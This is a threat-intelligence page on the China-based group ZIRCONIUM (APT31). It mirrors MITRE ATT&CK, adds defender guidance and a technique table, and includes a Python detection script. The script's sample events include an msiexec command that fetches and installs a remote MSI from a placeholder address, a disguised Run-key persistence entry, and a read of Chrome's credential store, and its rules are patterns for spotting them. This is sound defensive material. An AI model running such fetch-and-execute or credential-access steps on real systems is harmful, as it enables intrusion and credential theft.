MITRE ATT&CK® Group

G0128: ZIRCONIUM

ZIRCONIUM is a threat group operating out of China, active since at least 2017, that has targeted individuals associated with the 2020 US presidential election and prominent leaders in the international affairs community.[1][2]

Enterprise | G0128 | Group | Object v2.3
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

ATT&CK describes ZIRCONIUM, also known as APT31 and Violet Typhoon, as a China-based threat group active since at least 2017 and associated in reporting with targeting people connected to the 2020 U.S. presidential election and prominent international affairs leaders. For defenders, the useful takeaway is not the name alone: the mapped behaviors span phishing links, user-driven execution, discovery, credential access from browsers, persistence through Run Keys or startup folders, command-and-control over proxies/web services/encryption, tool transfer, and exfiltration over C2 or to cloud storage.

Executive priority

This group profile is most useful for prioritizing readiness around high-value people, politically or diplomatically sensitive work, and organizations where email, identity, endpoint, browser credentials, and cloud storage are business-critical. Leaders should ask whether the organization can prove prevention, detection, and response coverage for spearphishing links, suspicious script and command execution, browser credential theft, persistence changes, and unusual outbound or cloud-storage data movement.

Technical view

ATT&CK provides no group-specific detection text, so SOC and IR teams should validate coverage from the mapped techniques. Focus on Windows-relevant behaviors such as Registry queries, Run Key/startup persistence, cmd.exe, msiexec abuse, browser credential access, and task/service masquerading, while also checking cross-platform telemetry for Python execution, system/user/network discovery, inbound tool transfer, encrypted or proxied C2, and exfiltration to C2 or cloud storage. Detection logic should correlate early access indicators such as spearphishing links and malicious-link execution with follow-on discovery, persistence, credential access, and outbound transfer patterns.

Likely telemetry

  • Email security and URL-click telemetry for spearphishing links and malicious-link execution
  • Endpoint process creation, command-line, parent-child process, and script execution telemetry
  • Windows Registry auditing for discovery and Run Key/startup persistence changes
  • Service, scheduled task, startup folder, and task-name metadata for masquerading review
  • Browser credential store access and suspicious file access around browser profile data

Detection direction

  • Build behavior chains rather than relying on the group name: phishing link or user execution followed by discovery, credential access, persistence, tool transfer, and outbound transfer is higher-value than any single weak signal.
  • Tune Windows detections for cmd.exe, msiexec.exe, Registry queries, Run Key changes, and browser credential access, with allowlists for legitimate administration and software installation activity.
  • Review visibility gaps for encrypted C2, legitimate web-service communications, and cloud storage uploads, since these can blend into normal business traffic.
  • Use masquerading detections that compare task/service names, paths, publishers, and execution context against known-good baselines.
  • Treat proxy and cloud-service indicators carefully: the ATT&CK mapping supports these behaviors, but source IP attribution and service use alone are not reliable proof of this group.
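As an added example (not part of this Glexia take or of the ATT&CK object), the "behavior chain over single signal" idea applied to constructed Sysmon-like events: the event field names, the vendor known-good baseline and the stage labels are assumptions, and the records are made up to exercise the rules on this page (msiexec fetching a remote MSI, a Run key named after Dropbox pointing at a Python binary, a non-browser process reading Chrome's credential store).

```python
from collections import defaultdict
from datetime import datetime, timedelta
# Constructed, Sysmon-like sample telemetry (not real logs) for two hosts.
EVENTS = [
    {"host": "ws01", "ts": "2020-10-01T09:00:00", "type": "process",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /i http://203.0.113.7/update.msi /q"},
    {"host": "ws01", "ts": "2020-10-01T09:02:10", "type": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "Dropbox Update Setup",
     "data": r"C:\Users\a\AppData\Local\py\python.exe -m client"},
    {"host": "ws01", "ts": "2020-10-01T09:05:30", "type": "file",
     "image": r"C:\Users\a\AppData\Local\py\python.exe",
     "path": r"C:\Users\a\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"host": "ws02", "ts": "2020-10-01T11:00:00", "type": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "value": "Dropbox",
     "data": r"C:\Program Files (x86)\Dropbox\Client\Dropbox.exe"},
]
# Assumed known-good baseline: a Run value naming a vendor runs from that vendor's install dir.
BASELINE = {"dropbox": "c:\\program files (x86)\\dropbox\\"}
BROWSER_STORES = ("login data", "cookies", "web data")
def stage(ev):
    """Map one event to an ATT&CK-derived stage label, or None if it looks benign."""
    if ev["type"] == "process" and ev["image"].lower().endswith("msiexec.exe") \
            and "http" in ev["cmdline"].lower():
        return "T1218.007 msiexec fetching a remote MSI"
    if ev["type"] == "registry" and ev["key"].lower().endswith("\\run"):
        name, data = ev["value"].lower(), ev["data"].lower()
        for vendor, install in BASELINE.items():
            if vendor in name and not data.startswith(install):
                return "T1547.001/T1036.004 Run key masquerading as vendor updater"
    if ev["type"] == "file" and "chrome" not in ev["image"].lower() \
            and any(s in ev["path"].lower() for s in BROWSER_STORES):
        return "T1555.003 non-browser read of browser credential store"
    return None
def correlate(events, window=timedelta(hours=1), min_stages=2):
    """Return {host: sorted stage labels} for hosts with >= min_stages distinct stages in one window."""
    per_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        if (label := stage(ev)):
            per_host[ev["host"]].append((datetime.fromisoformat(ev["ts"]), label))
    hits = {}
    for host, seq in per_host.items():
        for i, (t0, _) in enumerate(seq):
            stages = {lab for t, lab in seq[i:] if t - t0 <= window}
            if len(stages) >= min_stages:
                hits[host] = sorted(stages)
                break
    return hits
```

Host ws02 sets a Dropbox-named Run value from the vendor's install directory and produces no stage, which is the allowlisting the bullets above ask for; ws01 chains three stages inside the window and is the only hit.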

Mitigation priorities

  • Prioritize phishing-resistant controls and user reporting workflows for high-risk staff and roles exposed to political, international affairs, or sensitive communications.
  • Harden endpoint execution paths by controlling script interpreters, command shell abuse, installer proxy execution, startup locations, and unauthorized persistence changes.
  • Reduce credential exposure by strengthening browser credential policy, endpoint protection, and identity monitoring for suspicious credential use.
  • Improve egress governance: monitor or restrict unsanctioned cloud storage, unusual external web-service use, and tool-transfer paths while preserving approved business workflows.
  • Maintain vulnerability and patch discipline because ATT&CK maps the group to exploitation for privilege escalation, but validate priorities against local asset exposure and exploitability.

Analyst notes and limits

The decision value of this ATT&CK object comes from the relationship set: ZIRCONIUM is mapped to initial access through spearphishing links, execution through user action and command/script mechanisms, discovery, persistence, credential access, C2, and exfiltration. This supports a readiness review across SOC monitoring, incident response evidence collection, identity protection, cloud-storage governance, and vulnerability management.

ATT&CK provides no official detection guidance, no platforms on the intrusion-set object itself, and no claim here should be read as evidence of current activity against any specific organization. Platform references in this take come from related ATT&CK techniques, not from a group-level platform field. Local telemetry, exposure, and threat-intelligence validation are required before making risk or attribution judgments.

Official MITRE ATT&CK definition

ZIRCONIUM

ZIRCONIUM is a threat group operating out of China, active since at least 2017, that has targeted individuals associated with the 2020 US presidential election and prominent leaders in the international affairs community.[1][2]

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library).

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

29 rows (Domain | ID | Name, with the relationship/procedure text below each row)

Enterprise | T1082 | System Information Discovery
  ZIRCONIUM has used a tool to capture the processor architecture of a compromised host in order to register it with C2. (Citation: Zscaler APT31 Covid-19 October 2020)

Enterprise | T1598 | Phishing for Information
  ZIRCONIUM targeted presidential campaign staffers with credential phishing e-mails. (Citation: Google Election Threats October 2020)

Enterprise | T1012 | Query Registry
  ZIRCONIUM has used a tool to query the Registry for proxy settings. (Citation: Zscaler APT31 Covid-19 October 2020)

Enterprise | T1665 | Hide Infrastructure
  ZIRCONIUM has utilized an ORB (operational relay box) network – consisting of compromised devices such as small office and home office (SOHO) routers, IoT devices, and leased virtual private servers (VPS) – to obfuscate the origin of C2 traffic. (Citation: ORB Mandiant)

Enterprise | T1059.003 | Windows Command Shell (sub-technique)
  ZIRCONIUM has used a tool to open a Windows Command Shell on a remote host. (Citation: Zscaler APT31 Covid-19 October 2020)

Enterprise | T1583.006 | Web Services (sub-technique)
  ZIRCONIUM has used GitHub to host malware linked in spearphishing e-mails. (Citation: Google Election Threats October 2020; Zscaler APT31 Covid-19 October 2020)

Enterprise | T1584.008 | Network Devices (sub-technique)
  ZIRCONIUM has compromised network devices such as small office and home office (SOHO) routers and IoT devices for ORB (operational relay box) proxy networks. (Citation: ORB APT31; ORB Mandiant)

Enterprise | T1555.003 | Credentials from Web Browsers (sub-technique)
  ZIRCONIUM has used a tool to steal credentials from installed web browsers including Microsoft Internet Explorer and Google Chrome. (Citation: Zscaler APT31 Covid-19 October 2020)

Enterprise | T1059.006 | Python (sub-technique)
  ZIRCONIUM has used Python-based implants to interact with compromised hosts. (Citation: Google Election Threats October 2020; Zscaler APT31 Covid-19 October 2020)

Enterprise | T1547.001 | Registry Run Keys / Startup Folder (sub-technique)
  ZIRCONIUM has created a Registry Run key named Dropbox Update Setup to establish persistence for a malicious Python binary. (Citation: Zscaler APT31 Covid-19 October 2020)

Enterprise | T1573.001 | Symmetric Cryptography (sub-technique)
  ZIRCONIUM has used AES encrypted communications in C2. (Citation: Zscaler APT31 Covid-19 October 2020)

Enterprise | T1124 | System Time Discovery
  ZIRCONIUM has used a tool to capture the time on a compromised host in order to register it with C2. (Citation: Zscaler APT31 Covid-19 October 2020)

Enterprise | T1140 | Deobfuscate/Decode Files or Information
  ZIRCONIUM has used the AES256 algorithm with a SHA1 derived key to decrypt exploit code. (Citation: Check Point APT31 February 2021)

Enterprise | T1598.003 | Spearphishing Link (sub-technique)
  ZIRCONIUM has used web beacons in e-mails to track hits to attacker-controlled URLs. (Citation: Microsoft Targeting Elections September 2020)

Enterprise | T1566.002 | Spearphishing Link (sub-technique)
  ZIRCONIUM has used malicious links in e-mails to deliver malware. (Citation: Microsoft Targeting Elections September 2020; Google Election Threats October 2020; Zscaler APT31 Covid-19 October 2020)

Enterprise | T1583.001 | Domains (sub-technique)
  ZIRCONIUM has purchased domains for use in targeted campaigns. (Citation: Microsoft Targeting Elections September 2020)

Enterprise | T1033 | System Owner/User Discovery
  ZIRCONIUM has used a tool to capture the username on a compromised host in order to register it with C2. (Citation: Zscaler APT31 Covid-19 October 2020)

Enterprise | T1090.003 | Multi-hop Proxy (sub-technique)
  ZIRCONIUM has utilized an ORB (operational relay box) network – consisting of compromised devices such as small office and home office (SOHO) routers, IoT devices, and leased virtual private servers (VPS) – to proxy traffic. (Citation: ORB Mandiant)

Enterprise | T1041 | Exfiltration Over C2 Channel
  ZIRCONIUM has exfiltrated files via the Dropbox API C2. (Citation: Zscaler APT31 Covid-19 October 2020)

Enterprise | T1036 | Masquerading
  ZIRCONIUM has spoofed legitimate applications in phishing lures and changed file extensions to conceal installation of malware. (Citation: Google Election Threats October 2020; Zscaler APT31 Covid-19 October 2020)

Enterprise | T1567.002 | Exfiltration to Cloud Storage (sub-technique)
  ZIRCONIUM has exfiltrated stolen data to Dropbox. (Citation: Zscaler APT31 Covid-19 October 2020)

Enterprise | T1027.002 | Software Packing (sub-technique)
  ZIRCONIUM has used multi-stage packers for exploit code. (Citation: Check Point APT31 February 2021)

Enterprise | T1204.001 | Malicious Link (sub-technique)
  ZIRCONIUM has used malicious links in e-mails to lure victims into downloading malware. (Citation: Google Election Threats October 2020; Zscaler APT31 Covid-19 October 2020)

Enterprise | T1036.004 | Masquerade Task or Service (sub-technique)
  ZIRCONIUM has created a run key named Dropbox Update Setup to mask a persistence mechanism for a malicious binary. (Citation: Zscaler APT31 Covid-19 October 2020)

Enterprise | T1068 | Exploitation for Privilege Escalation
  ZIRCONIUM has exploited CVE-2017-0005 for local privilege escalation. (Citation: Check Point APT31 February 2021)

Enterprise | T1218.007 | Msiexec (sub-technique)
  ZIRCONIUM has used the msiexec.exe command-line utility to download and execute malicious MSI files. (Citation: Zscaler APT31 Covid-19 October 2020)

Enterprise | T1105 | Ingress Tool Transfer
  ZIRCONIUM has used tools to download malicious files to compromised hosts. (Citation: Zscaler APT31 Covid-19 October 2020)

Enterprise | T1016 | System Network Configuration Discovery
  ZIRCONIUM has used a tool to enumerate proxy settings in the target environment. (Citation: Zscaler APT31 Covid-19 October 2020)

Enterprise | T1102.002 | Bidirectional Communication (sub-technique)
  ZIRCONIUM has used Dropbox for C2, allowing upload and download of files as well as execution of arbitrary commands. (Citation: Google Election Threats October 2020; Zscaler APT31 Covid-19 October 2020)

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.

ATT&CK release: 19.1
Object version: 2.3
Created:
Modified:
Raw hash: 2d23caddc21c7275...

Imported snapshots across ATT&CK releases (1)
Release | Bundle imported | Object version | Modified | Status | Raw hash
19.1 | | 2.3 | | Current bundle | 2d23caddc21c…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1] Microsoft Targeting Elections September 2020: Burt, T. (2020, September 10). New cyberattacks targeting U.S. elections. Retrieved March 24, 2021.
  2. [2] Check Point APT31 February 2021: Itkin, E. and Cohen, I. (2021, February 22). The Story of Jian – How APT31 Stole and Used an Unknown Equation Group 0-Day. Retrieved March 24, 2021.
  3. [3] APT31 (Citation: Check Point APT31 February 2021)
  4. [4] Microsoft Threat Actor Naming July 2023: Microsoft. (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
  5. [5] Violet Typhoon (Citation: Microsoft Threat Actor Naming July 2023)
  6. [6] mitre-attack G0128

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.